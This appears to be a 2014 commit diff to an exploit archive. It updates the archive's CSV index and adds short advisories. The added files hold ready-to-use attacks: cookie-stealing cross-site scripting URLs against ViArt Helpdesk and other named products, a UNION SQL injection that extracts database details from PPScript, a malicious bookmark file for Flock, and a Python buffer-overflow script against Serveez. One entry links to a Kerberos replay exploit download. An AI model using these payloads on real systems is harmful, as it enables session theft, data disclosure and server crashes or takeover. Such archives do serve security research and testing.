Updated 09_02_2014

files.csv

@@ -3204,7 +3204,7 @@ id,file,description,date,author,platform,type,port
 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69
 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0
 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0
-3544,platforms/windows/remote/3544.c,"Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
+3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0
 3545,platforms/php/webapps/3545.txt,"LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0
 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability",2007-03-22,parad0x,asp,webapps,0
 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0
@@ -31039,7 +31039,8 @@ id,file,description,date,author,platform,type,port
 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
 34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0
 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution Vulnerability",2014-08-29,"Claudio Viviani",multiple,remote,0
-34463,platforms/windows/local/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,local,0
+34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass Vulnerability",2010-08-13,"Emmanuel Bouillon",windows,remote,0
+34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0
 34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0
 34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22
 34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0
@@ -31064,3 +31065,14 @@ id,file,description,date,author,platform,type,port
 34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
 34486,platforms/php/webapps/34486.txt,"PHPCMS2008 'download.php' Information Disclosure Vulnerability",2009-10-19,Securitylab.ir,php,webapps,0
 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0
+34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0
+34493,platforms/php/webapps/34493.txt,"PPScript 'shop.htm' SQL Injection Vulnerability",2009-08-03,MizoZ,php,webapps,0
+34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk article.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk product_details.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk reviews.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0
+34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0
+34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
+34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0

platforms/asp/webapps/34492.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42535/info
+
+Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Online Work Order Suite Lite Edition 3.10 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
+http://www.example.com/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
+http://www.example.com/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>

platforms/multiple/remote/34500.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42556/info
+
+Flock Browser is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to Flock 3.0.0.4094 are vulnerable.
+
+<!DOCTYPE NETSCAPE-Bookmark-file-1> <!-- This is an automatically generated file. It will be read and overwritten. DO NOT EDIT! --> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"> <TITLE>Bookmarks</TITLE> <H1>Menú Marcadores</H1> <DL><p> <DT><A HREF="http://www.example.com" ADD_DATE="1282083605" LAST_MODIFIED="1282083638">"><script src='http://www.example.com/thirdparty/scripts/ckers.org.js'></A> </DL><p> 

platforms/php/webapps/34493.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/42539/info
+
+PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+
+http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
+http://www.example.com/shop.htm?cid=31+and+1=1
+http://www.example.com/shop.htm?cid=31+and+1=100 

platforms/php/webapps/34494.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+httpwww.example.com/helpdesk-demo/products.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>

platforms/php/webapps/34495.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+ 
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+httpwww.example.com/helpdesk-demo/article.php?category_id=1--><ScRiPt %0D%0A>alert(516318270235)%3B</ScRiPt>

platforms/php/webapps/34496.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+  
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  
+httpwww.example.com/helpdesk-demo/product_details.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>

platforms/php/webapps/34497.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+   
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+   
+httpwww.example.com/helpdesk-demo/reviews.php?category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>

platforms/php/webapps/34498.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+    
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+    
+httpwww.example.com/helpdesk-demo/forum.php?forum_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>

platforms/php/webapps/34499.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42543/info
+    
+ViArt Helpdesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+    
+httpwww.example.com/helpdesk-demo/products_search.php?search_category_id=1>"><ScRiPt %0D%0A>alert(414577246752)%3B</ScRiPt>

platforms/php/webapps/34501.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42558/info
+
+Hitron Soft Answer Me is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Answer Me 1.0 is vulnerable; other versions may be affected. 
+
+http://www.example.com/answers?q_id=1>"><ScRiPt %0D%0A>alert(413587968783)%3B</ScRiPt>

platforms/windows/dos/34502.py

@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/42560/info
+
+Serveez is prone to a remote stack-based buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Serveez 0.1.7 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/env python
+#
+#    (,_    ,_,    _,)    SERVEEZ (HTTP SERVER) <= 0.1.7    (,_    ,_,    _,)
+#    /|\`-._( )_.-'/|\      REMOTE BUFFER OVERFLOW POC      /|\`-._( )_.-'/|\
+#   / | \`'-/ \-'`/ | \   AUTHOR:  LORD VENOM ANTICHRIST   / | \`'-/ \-'`/ | \
+#  /  |_.'-.\ /.-'._|  \     <lvaclvaclvac@gmail.com>     /  |_.'-.\ /.-'._|  \
+# /_.-'      "      `-._\ GRETZ TO ALL HEAVY METAL MUSIC /_.-'      "      `-._\
+#
+
+import sys, socket
+
+try:
+  host = sys.argv[1]
+  port = int(sys.argv[2]) # OFTEN 42422
+  path = sys.argv[3] # MUST EXIST
+except:
+  print "LAMER"
+  exit(1)
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+  soc.connect((host, port))
+  req = "GET " + path + " HTTP/1.0\r\nIf-Modified-Since: " + ("A" * 50) + "\r\n\r\n"
+  # WE RULE OVER EIP! (EVIL INCARNATE PENTAGRAM)
+  soc.send(req)
+  print "DONE"
+  satan = 666
+except:
+  print "CAN'T CONNECT"
+  exit(2)
+
+exit(0)
+
+#                ,
+#               (@|
+#  ,,           ,)|_____________________________________
+# //\\8@8@8@8@8@8 / _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \ OBEY THE MERCYLESS SWORD
+# \\//8@8@8@8@8@8 \_____________________________________/  OF SATANIC METAL POWER
+#  ``           `)|
+#               (@|
+#                `
+

platforms/windows/remote/34462.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42435/info
+
+The Microsoft Windows implementation of Kerberos is prone to a security-bypass vulnerability.
+
+Successful exploits may allow attackers to gain unauthorized access to affected computers through replay attacks. 
+
+http://www.exploit-db.com/sploits/34462-2.tar.gz